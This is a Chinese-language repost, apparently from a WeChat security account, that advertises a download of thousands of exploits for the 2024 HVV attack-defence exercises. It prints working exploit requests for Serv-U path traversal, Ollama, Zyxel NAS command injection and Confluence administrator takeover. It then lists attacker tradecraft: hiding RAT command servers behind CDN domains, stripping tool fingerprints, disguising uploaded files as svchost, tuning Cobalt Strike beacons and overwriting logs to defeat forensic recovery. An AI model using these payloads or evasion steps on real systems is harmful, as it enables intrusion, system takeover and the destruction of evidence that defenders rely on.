文件链接:
https://pan.baidu.com/s/1OiyRctbpROh5AZO0SJ9kzQ?pwd=6666
其他资源失效了请给我留言
CVE-2024-28995 Serv-U
EXP
curl -i -k --path-as-is https://192.168.86.43/?InternalDir=........etc^&InternalFile=passwd
文章连接:https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
CVE-2024-37032 开源AI模型 Ollama 远程代码执行漏洞
POC:http://[victim]:11434/api/pull
文章连接:https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
CVE-2024-29972 – NsaRescueAngel后门账户
POC:ip后面直接添加
/cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__('subprocess').check_output('id', shell=True)%23
信息泄露
POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
------WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="c0"
storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("id", shell=True)#
------WebKitFormBoundaryHHaZAYecVOf5sfa6--
CVE-2023-22515-Atlassian Confluence Data Center 权限管理不当
EXP
GET /server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: localhost:8090
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
X-Atlassian-Token: no-check
在进行覆盖 setupComplete=false 之后重新注册管理员
POST /setup/setupadministrator.action HTTP/1.1
Host:127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Atlassian-Token: no-check
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
username=elk&fullName=elk&[email protected]&password=elk&confirm=elk&setup-next-button=Next
祝各位HVV顺利
工作环境
- 工作时全部操作均在虚拟机中完成
- 虚拟机中不登陆个人账号,如QQ、微信、网盘、CSDN等
- 渗透环境、开发环境、调试环境需要分开,从目标服务器上下载的程序需要在单独的环境中测试运行
- 渗透虚拟机中全程使用代理IP上网
- 物理机必须安装安全防护软件,并安装最新补丁,卸载与公司相关的特定软件
- fofa、cmd5、天眼查等第三方工具平台账号密码不得与公司有关,云协作平台同理
- RAT使用CDN保护的域名上线
- 尽量不使用公司网络出口,可以使用移动4G网卡,然后虚拟机再链代理
渗透工具
- WebShell不能使用普通一句话木马,连接端使用加密流量,建议使用蚁剑
- 不使用默认冰蝎,需要修改为硬编码密钥
- 内网渗透时尽量使用socks代理,在本地操作
- 上传程序到目标服务器时,需要修改文件名:如svchost等,尽量不上传内部自研工具
- 公开工具需要去除特征指纹,如:sqlmap、masscan、Beacon证书
- 工具需要设置线程或访问频率,如sqlmap的--delay、内网扫描时线程不大于5
- Cobalt Strike后⻔上线后,设置time.sleep⼤于500秒
- 手机短信验证码需使用在线平台如z-sms.com
- socks代理通道需要使用SSL加密
重点
- 攻防演习成功的关键是团队协作,要互相帮助学习和进步,不要勾心斗角,每个团队的成功都需要有人当红花有人当绿叶的,外网打点与内网渗透同等重要
- 渗透过程中,记住上传的webshell、木马等地址,服务器添加的账号,项目结束后要删除或描述在报告中,避免不必要的麻烦
- 登陆3389不建议添加用户,尝试激活guest,如必须要添加账号,账号名与目标相关即可,避免使用qax、qaxNB等友商关键词
- 清理日志时需要以文件覆盖的方式删除文件,防止数据恢复,或者仅删除指定ID的日志
- 碰到蜜罐就不要慌,多喝点花茶,这样嘎了会比较香
原文始发于微信公众号(仙网攻城狮):2024HVV最新POC/EXP,目前有8000+个POC/EXP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论